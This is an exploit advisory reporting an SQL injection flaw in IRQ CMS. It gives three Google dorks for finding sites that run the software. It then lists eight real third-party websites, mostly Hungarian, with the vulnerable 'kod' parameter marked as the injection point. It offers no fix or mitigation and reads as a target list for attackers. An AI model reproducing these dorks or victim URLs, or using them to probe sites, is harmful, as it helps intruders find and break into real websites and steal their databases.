In The Name Of God <~~~~~~~ Exploit Title:IRQ CMS SQL Injection Vulnerability Date: 8/14/2017 Author: Ashiyane Digital Security Team Vendor Homepage : http://www.irq.hu/ Risk Level : HIGH Category: Web Application Tested On : Windows 10 / Chrome |---------------------------------- Google Dork 1 : inurl:index.php?modul= intext:"weboldal tervezés: IRQ" Google Dork 2 : inurl:/index.php?modul=kepgaleria intext:"weboldal tervezés: IRQ" google Dork 3 : inurl:index.php?modul=galeria intext:"weboldal tervezés: IRQ" |---------------------------------- proof (SQLI) : 1 : http://www.afrikaexpo.hu/index.php?kod=[SQLI]&modul=galeria 2 : http://www.balletcamara.com/index.php?kod=[SQLI]&modul=galeria 3 : http://www.munkacsy-papa.hu/index.php?kod=[SQLI]&modul=galeria 4 : http://www.per.hu/index.php?kod=[SQLI]&modul=galeria 5 : http://www.karthagoband.com/index.php?modul=galeria&kod=[SQLI] 6 : http://www.kony.hu/index.php?modul=galeria&kod=[SQLI] 7 : http://www.kisalfoldi.hu/index.php?modul=kepgaleria&kod=[SQLI] 8 : http://kollegium.aporisk.hu/index.php?modul=kepgaleria&kod=[SQLI] |---------------------------------- | Discovered By : HackFanS |----------------------------------